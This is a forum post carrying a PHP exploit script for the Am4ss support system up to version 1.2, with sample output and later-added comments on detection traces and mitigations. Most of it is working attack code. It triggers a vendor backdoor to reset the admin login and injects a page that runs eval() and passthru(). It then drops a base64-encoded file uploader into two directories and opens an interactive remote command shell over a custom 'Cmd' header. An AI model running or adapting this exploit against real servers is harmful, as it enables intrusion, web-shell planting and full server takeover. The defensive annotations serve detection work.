
am4ss支持系统1.2 PHP代码注入利用

    发表于 2012-8-4 12:36:41 | 显示全部楼层 |阅读模式
    本帖最后由 上帝是只猪 于 2012-8-4 12:37 编辑
    1. <?
    2. /*
    3. + Title : Am4ss <= 1.2 , PHP Code Injection
    4. | Download : am4ss.com
    5. | Tested on: Windows xp sp3 , CentOs
    6. | Author : Faris , aka i-Hmx
    7. Time line :
    8. > 10/2011 , Vulnerability discovered
    9. > till now , i haven't reported the vendor , why!!!
    10.    The idiot backdoored it by himself + the official site is fucked up ;)
    11. > 19/07/2012 , Public Disclosured
    12.   
    13. C:\lab>php am4ss.php localhost /lab/am4ss/
    14. +---------------------------------------+
    15. |      Am4SS , PHP Code Injection       |
    16. |         Exploited By i-Hmx            |
    17. |                                       |
    18. +---------------------------------------+
    19. | Testing Authentication
    20. | Injecting our Evil php code
    21. | Searching for Injected PageID
    22.      => 0
    23.      => 1
    24.      => 2
    25.      => 3
    26.      => 4
    27.      => 5
    28. | Injected ID is 5
    29. | I Have wrriten Tiny uploader at :
    30.    + localhost/lab/am4ss//am4ss_cache/fa.php
    31.    + localhost/lab/am4ss//templates/fa.php
    32. | sec4ever shell online ;)
    33. i-Hmx@localhost# net user
    34. User accounts for \\
    35. -------------------------------------------------------------------------------
    36. Administrator            ASPNET                   Guest
    37. HelpAssistant            IUSR_PHOENIX-XP          IWAM_PHOENIX-XP
    38. PhoeniX                  PhoeniX.Limited          SUPPORT_388945a0
    39. The command completed with one or more errors.
    40.   
    41. i-Hmx@localhost# exit
    42. */
    // NOTE(review): observable traces this script leaves, all taken from the code below:
    //   - GET /libs/internals/core.assign_by_ref.php with fixed password/username/country query values
    //   - cookies Am4sS_CPCHERKAOUI_UserEmail / Am4sS_CPCHERKAOUI_PassWord carrying constant values
    //   - a page saved through /admincp/pages.php?do=add whose body contains eval() and passthru()
    //   - a sequential run of /pages.php?pageid=0..99 probes, then ?fa=<base64> requests and a "Cmd:" header
    //   - new files am4ss_cache/fa.php and templates/fa.php
    // Usage guard: target host and application path are positional arguments; without the
    // second one the script prints usage and stops.
    43. if(!$argv[2])
    44. {
    45. echo "\n+ usage : php ".$argv[0]." [Target without http://] /path/\nex : php ".$argv[0]." site.com /support/\n";
    46. exit();
    47. }
    // CLI run, so there is no HTTP session to resume; within this script $_SESSION only
    // carries 'host' and 'id' to later code in the same process, i.e. it acts as a plain
    // global array.
    48. session_start();
    49. echo "\n+---------------------------------------+\n";
    50. echo "|      Am4SS , PHP Code Injection       |\n";
    51. echo "|         Exploited By i-Hmx            |\n";
    52. echo "|          [url=mailto:n0p1337@gmail.com]n0p1337@gmail.com[/url]            |\n";
    53. echo "|       sec4ever.com , 1337s.cc         |\n";
    54. echo "+---------------------------------------+\n";
    55. $host=$argv[1];
    56. $_SESSION['host']=$host;
    57. $path=$argv[2];
    // Host and path are joined without a separator; with a trailing-slash path the later
    // "$vic/..." URLs contain a double slash, as the sample output in the header shows.
    58. $vic=$host.$path;
    // Return the text between the first occurrence of $start and the next $end.
    // A single space is prepended so that "not found" (false) and "found at offset 0"
    // both compare equal to 0 under the loose comparison below and yield "".
    function kastr($string, $start, $end){
      $haystack = ' '.$string;
      $from = strpos($haystack, $start);
      // Loose == on purpose: strpos() returns false when $start is absent.
      if ($from == 0) {
        return '';
      }
      $from += strlen($start);
      // If $end is missing, strpos() gives false and the length becomes negative,
      // which substr() treats as "drop that many bytes from the end".
      $length = strpos($haystack, $end, $from) - $from;
      return substr($haystack, $from, $length);
    }
    // Perform one HTTP request with cURL and return the response body (or false on failure).
    // $post is always handed to CURLOPT_POSTFIELDS, so even an empty string produces a POST;
    // $cookies is sent verbatim as the Cookie header. Redirects are not followed and the
    // whole transfer is capped at 20 seconds.
    function get($url,$post,$cookies){
      $handle = curl_init();
      $options = array(
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_URL            => 'http://'.$url,
        CURLOPT_POSTFIELDS     => $post,
        CURLOPT_COOKIE         => $cookies,
        CURLOPT_FOLLOWLOCATION => 0,
        CURLOPT_TIMEOUT        => 20,
      );
      curl_setopt_array($handle, $options);
      $body = curl_exec($handle);
      curl_close($handle);
      return $body;
    }
    79. /*
    80. Enabling the Dirty Backdoor
    81. */
    // $ok is assigned here but never read anywhere later in the script.
    82. $ok=kastr($vic,"[url=http://]http://","//[/url]");
    // Step 1: a single GET to the vendor's core.assign_by_ref.php with fixed password,
    // username and country query values; success is judged by $host appearing
    // (case-insensitively) in the urlencoded response. eregi() was removed in PHP 7.0, so
    // this script only runs under a PHP 5-era interpreter.
    // Detection: this request path together with a `password=` query parameter in the
    // web-server access log.
    83. if (!eregi($host,urlencode(get($vic."/libs/internals/core.assign_by_ref.php?password=ef211a58a6a04914923a7bf23a9a7f0c&username=%C7%E1%D4%D1%DE%C7%E6%ED&country=%C7%E1%E3%DB%D1%C8",'',''))))
    84. {
    85. die("+ Exploitation Failed :(");
    86. }
    87. /*
    88. authenticating using the updated admin data
    89. */
    90. echo "| Testing Authentication\n";
    // Step 2: fetch /admincp/settings.php presenting two fixed cookies and look for a known
    // table-footer markup fragment as the "logged in" signal. The cookie values are constants,
    // so a rule on the literal PassWord cookie value identifies this tool in logs.
    // Mitigation: the comment above says the previous request changed the admin record —
    // presumably the admin e-mail/password; after removing the vendor file, reset them and
    // invalidate existing sessions (confirm against the application).
    91. if(!eregi('<td class="tfoot" align="middle" colSpan="2">',get($vic."/admincp/settings.php","",'Am4sS_CPCHERKAOUI_UserEmail=alert@am4ss.com;Am4sS_CPCHERKAOUI_PassWord=ef211a58a6a04914923a7bf23a9a7f0c')))
    92. {
    93. /*
    94. login may failed due to bad connection , admincp path error , admin firewall .  .  . etc
    95. any way u can use the following data to login manually
    96. */
    97. echo "| Authentication Failed\n| Try to login manually using :\n   + User : [url=mailto:alert@am4ss.com]alert@am4ss.com[/url]\n   + Password : kawkawa\n   | auth cookies : \n   + Am4sS_CPCHERKAOUI_UserEmail : [url=mailto:alert@am4ss.com]alert@am4ss.com[/url]\n   + Am4sS_CPCHERKAOUI_PassWord  : ef211a58a6a04914923a7bf23a9a7f0c \n+ Exiting \n";
    98. die();
    99. }
    100. /*
    101. Creating new page to inject our evil php code
    102. */
    // Step 3: the page body stored through admincp/pages.php. It eval()s base64 taken from
    // the `fa` request parameter and runs base64 taken from the `Cmd` request header through
    // passthru(), wrapping command output in the literal markers faris>>> / <<<faris.
    // Presumably codetype=2 tells the application to execute the body as PHP — confirm
    // against the application; if so, that admin feature is the code-execution sink.
    // Hunt: stored pages whose body contains eval( or passthru(; responses containing ">>>".
    103. $facode='echo "<pre>Faris on the mic ;)<br>";@eval(base64_decode($_REQUEST[fa]));echo "faris>>>";passthru(base64_decode($_SERVER[HTTP_CMD]));echo "<<<faris";';
    104. echo "| Injecting our Evil php code\n";
    105. get($vic."/admincp/pages.php?do=add",'do=save&title=farsawy&codetype=2&code='.$facode.'','Am4sS_CPCHERKAOUI_UserEmail=alert@am4ss.com;Am4sS_CPCHERKAOUI_PassWord=ef211a58a6a04914923a7bf23a9a7f0c');
    106. echo "| Searching for Injected PageID\n";
    107. /*
    108. Trying to get the ijected pageid via testing 100 pages
    109. i don't think it will exceed 10 pages after all :)
    110. if this failed , retry exploitation and it will work as hell
    111. */
    // Step 4: probe pageid 0..99 and stop at the first page whose body contains ">>>".
    // Detection: a rapid sequential run of /pages.php?pageid=N requests from one client.
    112. for($f=0;$f<100;$f++)
    113. {
    114. $mypage=get($vic."/pages.php?pageid=$f","","");
    115. echo "     => $f\n";
    116. if(eregi(">>>",$mypage))
    117. {
    118. $_SESSION['id']=$f;
    119. break;
    120. }
    121. }
    122. $myid=$_SESSION['id'];
    123. echo "| Injected ID is $myid\n";
    124. /*
    125. Injecting tinni file uploader at the cache and the templates directories
    126. these usually chmoded to 777 by the admin
    127. */
    // Step 5: one `fa=` request carrying a base64 payload; per the author's comment and the
    // echo below it writes am4ss_cache/fa.php and templates/fa.php. Those directories should
    // not be both web-writable and PHP-executable; any unexpected .php file in them is an
    // indicator. Note there is no slash before "pages.php" here, so this relies on $path
    // ending in "/".
    128. get($vic."pages.php?pageid=$myid&fa=JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmID0gZm9wZW4oImFtNHNzX2NhY2hlL2ZhLnBocCIsInciKTsKJHQgPSBmb3BlbigidGVtcGxhdGVzL2ZhLnBocCIsInciKTsKZndyaXRlKCRmLCRjb2RlKTsKZndyaXRlKCR0LCRjb2RlKTs=","","");
    129. echo "| I Have wrriten Tiny uploader at :\n   + $vic/am4ss_cache/fa.php\n   + $vic/templates/fa.php\n";
    130. /*
    131. printing sec4ever1337s via passthru()
    132. to check if it's enabled or not
    133. */
    // Step 6: probes whether passthru() is enabled by asking the injected page to echo a
    // marker string; this request uses the loop counter $f, not $myid, as the page id.
    134. if (!eregi("sec4ever1337s",get($vic."/pages.php?pageid=$f&fa=cGFzc3RocnUoJ2VjaG8gc2VjNGV2ZXIxMzM3cycpOw==","","")))
    135. {
    136. echo "| passthru is disabled \n";
    137. echo "| You can evaluate Your code at:\n    $vic/pages.php?pageid=$myid&fa=base64_encode(eval code)\n";
    138. exit('+ Exiting');
    139. }
    140. echo "| sec4ever shell online ;)\n";
    141. /*
    142. if passthru() is enabled , then get small command executer
    143. using Egix fsock method to send and retrieve data
    144. */
    // Open a plain TCP connection to port 80 on $host, write the raw request bytes in
    // $packet, and return everything the server sends back until it closes the connection.
    function http_send($host, $packet)
    {
      $conn = fsockopen($host, 80);
      fwrite($conn, $packet);
      $reply = stream_get_contents($conn);
      return $reply;
    }
    // Raw HTTP/1.0 request template; %s is later filled with the base64 of each typed
    // command and travels in a non-standard "Cmd" request header — a simple header-name
    // rule for a reverse proxy or WAF catches this channel.
    151. $packet  = "GET /{$path}/pages.php?pageid=$myid HTTP/1.0\r\n";
    152. $packet .= "Host: {$host}\r\n";
    153. $packet .= "Cmd: %s\r\n";
    154. $packet .= "Connection: close\r\n\r\n";
    // Interactive loop: read one line from stdin ("exit" ends the loop), send the request
    // and print only the text between the faris>>> and <<<faris markers of the response.
    155. while(1)
    156. {
    157. print "\ni-Hmx@".$_SESSION['host']."# ";
    158. if (($fa = trim(fgets(STDIN))) == "exit") exit("\n+ Exiting");
    159. $response = http_send($host, sprintf($packet, base64_encode($fa)));
    160. $final=kastr($response,"faris>>>","<<<faris");
    161. echo $final;
    162. }
    163. /*
    164. woooooow , that really fucked my mind
    165. But it was funny :D
    166. Greets to all sec4ever members
    167. C u Guys in another Bomb ;)
    168. */
    169. ?>

    发表于 2012-8-4 15:37:48 | 显示全部楼层
    没看懂，给点说明嘛。